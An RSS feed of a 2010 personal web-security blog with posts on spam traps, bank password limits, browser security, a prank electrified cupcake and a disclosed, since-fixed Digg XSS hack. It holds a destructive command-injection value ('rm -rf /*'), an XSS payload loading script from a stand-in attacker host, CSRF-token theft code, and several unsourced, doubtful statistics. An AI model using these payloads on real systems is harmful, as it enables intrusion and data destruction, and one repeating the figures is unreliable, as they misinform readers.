<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">

<channel>
<title>Human_Bagel</title>
<link>http://beta.humanbagel.com/blog/</link>
<description>Human_Bagel's Web Security Blog</description>
<item>
<title><![CDATA[
The Story of Human Bagel
]]></title>
<pubDate>2010-08-13 15:08:16</pubDate>
<description><![CDATA[
<img src="/bagel-vinci-2.jpg" title="Human Bagel Logo" height="200" alt="Human Bagel Logo"><br /><br />I am commonly asked the origin of the name "Human Bagel."<br /><br />Until now, I wanted to leave it as a mystery, but the overwhelming number of you who want to know should be told, I suppose.<br /><br />It all started back in 2004. I was an evil high schooler looking to do some evil things to the school network. It was to be my first righteous hack.<br /><br />There was one problem: I needed a handle. I wanted to identify myself without my own name.<br /><br />Enter the video game: Unreal Tournament 2003. I was painfully addicted to this game at the time.<br /><br />There was one problem with it: the speakers on that old Windows 2000 computer were shot. My brother and I would leave the sound on and try to understand what the bots were saying.<br /><br />One in particular stood out. We never found out what they were trying to say, but through the blown speakers, it sounded exactly like "Die Human Bagel." My brother proposed that handle, and it's been with me ever since.
]]></description>
<link>http://humanbagel.com/blog/The+Story+of+Human+Bagel</link>
<guid>http://humanbagel.com/blog/The+Story+of+Human+Bagel</guid>
</item><item>
<title><![CDATA[
The Cupcake Paradigm Part II
]]></title>
<pubDate>2010-07-31 12:07:16</pubDate>
<description><![CDATA[
It's been several months since the original Cupcake Paradigm post came out, and I have formalized some additional information.<br /><br />Yes, yes, the position of a cupcake can be used to induce a <i>bad</i> decision.<br /><br />The names of the (pseudo) innocent have been changed for this story.<br /><br />A month after the original cupcake paradigm was released, I began to formulate a plan. I wanted to see how psychologically powerful the draw of cupcake position was.<br /><br />So, I hatched a plan. I searched far and wide for commercial cupcakes with foil wrappers that actually conduct electricity. Store clerks were indeed confused as to why I was testing their cupcakes with an ohmmeter, but it was critical that the foil's resistance was low.<br /><br />Finally, at a local King Soopers, I located a tray of 16 pink cupcakes with foil wrappers. The foil conducted electricity adequately and I was ready.<br /><br />I acquired a DC transformer from a discarded mobile phone charger, a 9V battery connector and a spool of wire from a local Radio Shack.<br /><br />I was ready to launch my plan. I connected the battery and wires to the transformer, and touched the outgoing contacts. The electrical shock was sufficient to make me jump, and think twice about the ethics of my experiment. I decided, however, that science and humor must go on.<br /><br />I bifurcated the foil wrapper, carefully separating it vertically. I then attached the contacts to the wires, and promised a lunch in exchange for a friend testing it (the lunch was delicious).<br /><br />I strategically placed the shocking wires and unit in such a way that anyone could clearly see that the cupcake was electrified.<br /><br />I placed the electric cupcake in the number one position and went to watch.<br /><br />45 minutes later, Chuck came in and attempted to acquire that cupcake. He seemed oddly surprised that the cupcake shocked him, and tried again.
Finally, he settled on the number five position cupcake.<br /><br />20 minutes passed and another came to the tray. He observed the wires for a moment, and tried for the cupcake. He was shocked and recoiled his hand. Then he tried again. And again. And again. Charley tried no less than <i>seven times</i> before walking away disgruntled.<br /><br />Each of the six people that approached the tray observed the wires and still tried for the electric cupcake. Most of them tried twice for reasons unknown before settling on another cupcake. Only one person walked away.<br /><br />What can we learn from this? I think that the second installment of the Cupcake Paradigm teaches us that the position and possibly aggressive nature of a cupcake makes it overwhelmingly desirable.<br /><br />It is obvious that, whether by position or by curiosity, the electric cupcake fared amazingly compared to its non-electric counterparts.<br /><br />The other lesson I learned is that I am no longer permitted to bring cupcakes home. Ever.
]]></description>
<link>http://humanbagel.com/blog/The+Cupcake+Paradigm+Part+II</link>
<guid>http://humanbagel.com/blog/The+Cupcake+Paradigm+Part+II</guid>
</item><item>
<title><![CDATA[
What does real hacking look like?
]]></title>
<pubDate>2010-07-27 02:07:10</pubDate>
<description><![CDATA[
This is a requested post from some people outside of the field curious about hacking.<br /><br />We all know what hacking looks like on TV: epic 3D realms, police chases, spiffy colored screens, and exciting battles with network admins. It looks more like Geometry Wars than development.<br /><br />If this were what hacking was like, it would be a much more popular hobby.<br /><br />The sad reality is that hacking involves more tedium and leftover Chinese food than anything else.<br /><br />So, let me walk you through a typical hacking experience.<br /><br />I decide I'm going to hack XYZ, Inc., a web hosting service.<br /><br />First, I'd run a lot of scans, looking for open ports, trying to guess the operating system and services installed on the servers, and looking for known exploits.<br /><br />The heart of hacking is the <i>exploit.</i> An exploit is effectively a bug in software that can be leveraged to do something malicious. For example, if I have a program that returns the output from a directory list command "ls <users input>", a hacker may input ".; rm -rf /*", which would make the executed code "ls .; rm -rf /*", deleting everything allowed on the server.<br /><br />There are many hundreds of types of exploits, but they are all essentially bugs in software that can be leveraged maliciously.<br /><br />So, how does a hacker find one? Well, after running a plethora of scans, he will go through each and every service, one by one, trying dozens of inputs, trying to get an error message.<br /><br />Hackers get excited about error messages; it means they found a bug. Once an error is found (even though they don't always display an error message) the hacker will expand on that, trying to do... anything. Eventually, he may just get some remote code execution, or privilege escalation, or something fun.<br /><br />The sad reality of the hacker is hours upon hours of looking at error messages and taking educated guesses as to what to try next.
<br /><br />In general, hackers are little more than very good programmers who got bored. The image of some 14-year-old in his mother's basement hacking the NSA is pretty uncommon; it's usually a young professional, or a seasoned developer who wanted to have a little more fun.<br /><br />It should be noted, however, that the hours or days of tedium, scans, waiting, and thinking with no certainty of getting anywhere is not fun to most people.<br /><br />The more interesting thing is the reasoning behind the hacker. Well over 95% of people convicted of computer crimes have an intellect considered "very bright" or higher. 80% have diagnosed psychological conditions, with major depressive disorder, bipolar disorder, and thought disorders (delusions, paranoia, hallucinations) being common.<br /><br />The simple answer to "why?" is not so simple. Every hacker has their own reasons, although from my experience of communicating with them, a disdain for society in general and boredom seem to top the list.
]]></description>
<link>http://humanbagel.com/blog/What+does+real+hacking+look+like%3F</link>
<guid>http://humanbagel.com/blog/What+does+real+hacking+look+like%3F</guid>
</item><item>
<title><![CDATA[
The single greatest threat to internet security
]]></title>
<pubDate>2010-07-19 23:07:57</pubDate>
<description><![CDATA[
We all know about this blight of the internet: flashing, annoying, irritating, often misleading ads all over the internet.<br /><br />They are not relevant, useful, or even respectful. They are often misleadingly malicious, utilizing fake user interfaces to confuse the unsavvy crowd.<br /><br />These Flash advertisements are the number one greatest threat to the security of end users everywhere, and by extension, the entire internet.<br /><br />Not only do they mislead, scam, and confuse, but they often utilize exploits in Internet Explorer to install malware on victims' computers.<br /><br />90% of malware on computers is from Flash advertisements, the huge majority slipping through Internet Explorer's weak security.<br /><br />This is so profound that most users, when armed with Firefox and Adblock Plus (ad blocking software), don't even need an antivirus program installed on their computer.<br /><br />Now, let's level here. I know why admins do it. Websites are expensive; they require domain names, development, hosting, and a lot of time to make a successful website, so admins feel they deserve their cut. They try and get this from paid Flash advertisements.<br /><br />But, for the tempted, here are a few statistics: <ul><li>Flash advertisements increase a page's bounce rate by more than 75%</li><li>On average, one page with Flash advertisements will infect 5% of the users that see it, often more.</li><li>When asked about the most annoying part of web surfing, the number one answer is "Flash advertisements"</li></ul><br /><br />Usually, the revenue from Flash advertisements is much lower than contextual text advertisements from Google or Yahoo.<br /><br />No ad revenue will be made from me until this situation improves; for me it's <a href="http://getfirefox.com">Firefox</a> and <a href="http://adblockplus.org/en/">Adblock Plus</a>.
]]></description>
<link>http://humanbagel.com/blog/The+single+greatest+threat+to+internet+security</link>
<guid>http://humanbagel.com/blog/The+single+greatest+threat+to+internet+security</guid>
</item><item>
<title><![CDATA[
Spam Study Part II: Prevention
]]></title>
<pubDate>2010-05-09 20:05:23</pubDate>
<description><![CDATA[
More data is in.<br />I have established some more relevant facts:<br />1) Most spam bots are "all purpose" bots, meaning that they will search for email addresses to spam, search for forms to spam, and look for known exploits on a website to sell.<br /><br />2) Spam bots are stupid.<br /><br />So, what do we do about it?<br /><br />I propose a two-channel method: defense and offense.<br /><br /><b>Defense</b><br />There are countless ways to prevent spam. My personal favorite is to require JavaScript to complete the form. By this I mean, use JavaScript to change the "action" attribute of the form from a fake file to a real one on load, and if JavaScript is not enabled, inform the user that JavaScript is required, or default to a standard CAPTCHA.<br /><br /><b>Offense</b><br />It is not often that we can directly attack spam bots, or spammers themselves. I propose a simple solution: let them gorge themselves on email addresses registered to known spammers.<br /><br />Spam bots work by looking on every website for anything formatted like an email address; they then test the address to make sure it works and add it to a database. The database is then sold to the highest bidder.<br /><br />So, deciding that this is totally not cool, I wrote a simple script that will provide spammers with all the email addresses they want, up to half a million of them.<br /><br />One problem for them: these are all known spammer email addresses.<br /><br />They will think they just scored 500,000 email addresses, but they will only be spamming themselves.<br /><br /><a href="/Downloads/emails.zip">Download Spammer Jammer Script</a>
]]></description>
<link>http://humanbagel.com/blog/Spam+Study+Part+II%3A+Prevention</link>
<guid>http://humanbagel.com/blog/Spam+Study+Part+II%3A+Prevention</guid>
</item><item>
<title><![CDATA[
The Cupcake Paradigm
]]></title>
<pubDate>2010-02-11 22:02:22</pubDate>
<description><![CDATA[
Or, what we can learn about marketing from cupcakes.
<br />
<br />Living in a household with numerous roommates, food items tend to appear and disappear by the minute. Recently, a tray of cupcakes appeared (thanks, Karma) and I observed them disappear over the next day.
<br />
<br />I started noting geometric patterns with which the cupcakes would be consumed.
<br />
<br />Color, placement, and little plastic ring style determined their rate of consumption. For example, the red cupcakes went much faster than the purple ones. Also, the cupcakes with no plastic ring went first. I was fascinated with how I could accurately (~85% accuracy) identify the next cupcake to go.
<br />
<br />Still, I had far too many variables for a proper study.
<br />
<br />Intrigued, I purchased another tray of cupcakes, this time each having the same color. I then carefully noted the order in which they were eaten:
<br />
<br /><table style="text-align:center"><tr><td>13</td><td>14</td><td>15</td><td>16</td></tr><tr><td>12</td><td>5</td><td>8</td><td>9</td></tr><tr><td>11</td><td>2</td><td>3</td><td>6</td></tr><tr><td>10</td><td>1</td><td>4</td><td>7</td></tr></table>
<br />
<br />Repeating the experiment with bottles of soda, cookies, pens, packages of ramen noodles, "I am loved" pins, and forks, I started to notice that the original cupcake experiment was statistically representative of the overall pattern.
<br />
<br />So, expanding on the pattern, I paired high-value items (cupcakes) with low-value items (packages of ramen noodles), and noticed that even when the low-value items were placed in high-value positions (1, 2, 3, and 4), they were still consumed first, even though when placed side by side, one by one, the cupcakes were always taken first.
<br />
<br />My studies continue, as I try to derive a function from the movement, such that clients may improve the sales of less popular items, simply by their position on the page.
<br />
<br />So, my next step is to set up a study website, perhaps dealing with free cupcakes, to test this theory online, with a much larger sample size.
<br />
<br />I may also study if placement can be used to induce a <i>bad</i> decision, such as attempting to acquire an obviously electrified cupcake.
<br />
<br />Results to follow.
]]></description>
<link>http://humanbagel.com/blog/The+Cupcake+Paradigm</link>
<guid>http://humanbagel.com/blog/The+Cupcake+Paradigm</guid>
</item><item>
<title><![CDATA[
Microsoft's attack on humanity
]]></title>
<pubDate>2010-01-16 15:01:50</pubDate>
<description><![CDATA[
You may have read recently how Google's China division was attacked by Chinese nationalists to locate political dissidents, spurring Google to refuse to keep censoring their search results in China.<br /><br />This is an interesting topic in itself, but I want to talk about the security exploit used, the 0-day exploit, "Aurora," used against Microsoft Internet Explorer that caused this whole fiasco.<br /><br />Yet again IE screws up big time. Why Google employees were using IE is beyond me, but it highlights just another disaster caused by the buggy IE.<br /><br />This is far from the first time that IE has caused a massive security breach. Toshiba, IBM, and AIG have all been high-profile victims of IE's miserable security.<br /><br />I know many people that use IE for the sole reason of "it's the default, so it must be good" and many businesses that will not upgrade to a better browser due to the costs of installing an alternative browser on workstations. I propose, however, an alternative view: how much does a massive security breach cost, versus the cost of upgrading to a better browser?<br /><br />I know security consultants that manage multi-million dollar projects to secure massive networks, and yet still let the Windows 2000 workstations run Internet Explorer 6, which will yield a security vulnerability if you look at it angrily enough.<br /><br />Everyone, grow up and get a better browser.
]]></description>
<link>http://humanbagel.com/blog/Microsofts+attack+on+humanity</link>
<guid>http://humanbagel.com/blog/Microsofts+attack+on+humanity</guid>
</item><item>
<title><![CDATA[
Spam Study
]]></title>
<pubDate>2009-12-03 02:12:21</pubDate>
<description><![CDATA[
Last year, I started a study. I wanted to observe comment spammers in their natural environment, see how they function, how they move, and every other bit of data I could possibly find.<br /><br />So, I set up a spam trap: a fake comment form rigged to collect data. Here are the results.<br /><br />1) These bots found my comment form via a robots.txt Disallow statement, or via a rel="nofollow" link, meaning they intentionally look for things that web developers don't want scanned.<br /><br />2) Only one out of the nearly 2,000 spammers had JavaScript enabled.<br /><br />3) All of the spammers had cookies enabled.<br /><br />4) Spammers will put a test post first, containing different formatting methods for links; when the bot determines which one works, it returns with spam in that format (HTML, BBCode, etc).<br /><br />5) The bot will attempt to locate the posted spam, presumably for future reference.<br /><br />6) None of the spammers activated an onfocus, onclick, onkeypress, onmousemove, or any other event, with the exception of onload.<br /><br />From this data, I devised a very simple method to stop comment spam without CAPTCHAs: require JavaScript, and require a focus event. Those two should prevent all but the most determined customized comment spammers.<br /><br />For my next study, I will collect data about email harvesters, and try to correlate specific spam to a specific spambot by delivering a different email address to each bot, and logging the data. My hope is to make specific correlations about certain businesses that are using email harvesters, and hopefully deduce some of the businesses that are selling email lists from random email harvesting.<br /><br />Until then, ciao.
]]></description>
<link>http://humanbagel.com/blog/Spam+Study</link>
<guid>http://humanbagel.com/blog/Spam+Study</guid>
</item><item>
<title><![CDATA[
An open letter to banking institutions
]]></title>
<pubDate>2009-11-27 19:11:05</pubDate>
<description><![CDATA[
Dear assorted banking institutions, specifically those with online banking:<br /><br />Please stop putting absurd restrictions on password length or permitted characters.<br /><br />Recently, I changed banks. From which bank to which will remain private, but suffice it to say that I have now experienced three separate banking websites.<br /><br />In each case, the password length was restricted to less than 10 characters, and only alphanumeric characters were permitted, in other words, a-z, A-Z, and 0-9.<br /><br />In one particularly bad case, the password was limited to 7 alphanumeric characters, with a minimum of 5.<br /><br />There is absolutely no logical reason to limit the password length, or the character set for that matter.<br /><br />Allow me to explain. When a password is stored, any security professional on the planet will tell you to <i>hash</i> your passwords. This means a one-way encryption, that can be checked against your input, so that even if the database was exposed, the passwords would be secure.<br /><br />Any hash can take any length of input, and return the same length of hash. For example, if I use the MD5 hash on the phrase "The quick brown fox jumped over the lazy dog," or "A," the returned length will always be 32. So, space is no reason not to allow long passwords.<br /><br />All hashes take the input and return a fixed-length output using only 16 characters, 0-9 and A-F. So, if all input, no matter what it is, is returned in a fixed-length string made of predictable characters, there is no reason to reject <i>any</i> character as input, or, to be overly cautious, allow every character on the US keyboard.<br /><br />Why is this so important?<br /><br />Well, if we know that there is a maximum length of 7, a minimum length of 5, and a specific character set (a-z, A-Z, and 0-9), a brute-force attack just became very, very simple.
<br /><br />Granted, these websites have a set number of tries before the system locks up, but this can possibly be circumvented. What if a rogue employee with no such restriction were to launch the attack? What if some exploit were to bypass the lockdown? What if the password table were somehow dumped or leaked? All the passwords would be very, very vulnerable.<br /><br />OK, let's give the bank the benefit of the doubt, and say they use the Whirlpool hash, arguably one of the strongest, and they use a very nice salt, which is always a good practice.<br /><br />Well, if the lockdown were circumvented by a local employee or hacker, these safeguards would be useless, but for the sake of argument, let's say just the password hash table was dumped.<br /><br />Well, the salt is not difficult to find: just try a handful of common passwords, and crack the salt. Bingo, we have salt.<br /><br />Now, it's just a matter of running a very simple brute-force attack against the theoretical table, and with a character set so small, and such a defined size, every single password could be cracked on an average laptop in less than 5 days.<br /><br />So, I implore all of the banking institutions to ease the needless restrictions on password length and characters.
]]></description>
<link>http://humanbagel.com/blog/An+open+letter+to+banking+institutions</link>
<guid>http://humanbagel.com/blog/An+open+letter+to+banking+institutions</guid>
</item><item>
<title><![CDATA[
Automatic Digg Hack
]]></title>
<pubDate>2009-09-18 17:09:07</pubDate>
<description><![CDATA[
From the same guy who brought the <a href="/stumble.php">AutoStumbler</a> I bring you the AutoDigger!
<br />
<br />I reported the issue, and it has been corrected, meaning I get to publish!
<br />
<br />The exploit works on the same principle as before, a common XSS keyhole located in the search engine allows for automatic submission of the "Digg It" action.
<br />
<br />Granted, the code I made for this exploit was much nicer than before: based on AJAX as opposed to iframes, and it used referrer spoofing in the AJAX headers.
<br />
<br />The exploit works like this:
<br />In the search engine on digg.com, a developer forgot to escape the query inside of a script block, so, an injection of
<br /><blockquote></script><script src="http://evilsite.com/digg.js"></script></blockquote>can get easy remote JavaScript inclusion.
<br />
<br />WooHoo, now for the fun part, the JavaScript.
<br />
<br />First, I need to get the token. Luckily, it's on the home page when a user is logged in; I just have to extract it. Just make an AJAX request to the home page using their own API, and run something like this:<blockquote>var token = ajax.match(/[a-f0-9]{32}/)[0];</blockquote>There! We have our security token!
<br />
<br />Now, we just need two pieces of information, the itemID and the location. This is easy enough to get, use FireBug to watch a Digg request. Copy the itemID and the location.
<br />
<br />Now, all we have to do is craft the request and send it.
<br />
<br />We can use digg.com's built in digg() function. Pretty much used like this:<blockquote>digg(itemID,location);</blockquote>Done.
<br />
<br />Now, you might ask, "Why did you get the token if it was not needed for AutoDigging?"
<br />
<br />Good question, but I have my sights on something more valuable than getting something on the home page.
<br />
<br />I want CSRF or an AJAX worm. The token is the key to that. With AJAX and the token, you can do almost any user action with a little know-how. Edit the profile, set favorites, anything. Quite beautiful, I think.
]]></description>
<link>http://humanbagel.com/blog/Automatic+Digg+Hack</link>
<guid>http://humanbagel.com/blog/Automatic+Digg+Hack</guid>
</item></channel>
</rss>